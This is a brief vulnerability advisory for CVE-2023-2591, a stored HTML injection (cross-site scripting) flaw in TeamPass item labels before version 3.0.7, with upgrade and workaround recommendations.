CVE-2023-2591

Name of the Vulnerable Software and Affected Versions teampass versions prior to 3.0.7

Description The issue is related to improper neutralization of input during web page generation, also known as cross-site scripting. In the GitHub repository nilsteampassnet/teampass, if two users have the same folder access, malicious users can create an item where its label field is vulnerable to HTML injection. When other users see that item, it may force them to redirect to the attacker's website or capture their data using a form.

Recommendations For versions prior to 3.0.7, update to version 3.0.7 to resolve the issue. As a temporary workaround, consider restricting access to items that may contain malicious labels to minimize the risk of exploitation. Avoid using the label field in items until the issue is resolved.